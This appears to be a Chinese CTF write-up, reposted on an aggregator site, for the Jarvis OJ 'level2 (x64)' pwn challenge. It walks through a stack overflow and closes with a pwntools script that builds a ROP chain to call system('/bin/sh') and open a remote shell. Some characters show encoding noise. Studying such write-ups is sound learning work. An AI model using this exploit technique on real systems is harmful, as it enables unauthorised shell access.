當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

[Jarvis OJ - PWN]——[XMAN]level2(x64)

發(fā)布時(shí)間：2024/4/17 编程问答 25 豆豆

生活随笔收集整理的這篇文章主要介紹了 [Jarvis OJ - PWN]——[XMAN]level2(x64) 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

[Jarvis OJ - PWN]——[XMAN]level2(x64)

題目地址：https://www.jarvisoj.com/challenges
題目：

checksec一下，是64位程序。開啟了NX保護(hù)
在IDA看一下，main函數(shù)中有我們要的system函數(shù)，

vulnerable_function函數(shù)中也有。不過可惜參數(shù)都不對(duì)，任取一個(gè)system地址就好就好。但是我們找到了棧溢出的利用函數(shù)read。buf距離rbp的距離為0x80

查找一下看看有沒有**"/bin/sh"字符串,發(fā)現(xiàn)地址在0x0600A90**

**因?yàn)槭?4位程序，所以函數(shù)的前六個(gè)參數(shù)依次會(huì)使用rdi、rsi、rdx、rcx、r8、r9寄存器進(jìn)行傳遞。system只有一個(gè)參數(shù)，使用的寄存器是rdi。**查找一下匯編指令pop rdi的地址，0x04006b3。

所以exploit為

from pwn import * p = remote("pwn2.jarvisoj.com",9882) binsh = 0x0600A90 pop_rdi=0x04006b3 sys = 0x0400603 #0x040063E 0x04004C0 payload = 'a'*(0x80 + 0x8) payload += p64(pop_rdi)+ p64(binsh) #將"/bin/sh"pop到rdi寄存器中 payload += p64(sys) #執(zhí)行system函數(shù) p.recvline() p.sendline(payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[Jarvis OJ - PWN]——[XMAN]level2(x64)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： Linux下程序的保护机制(checks
下一篇： Linux下.rar文件解压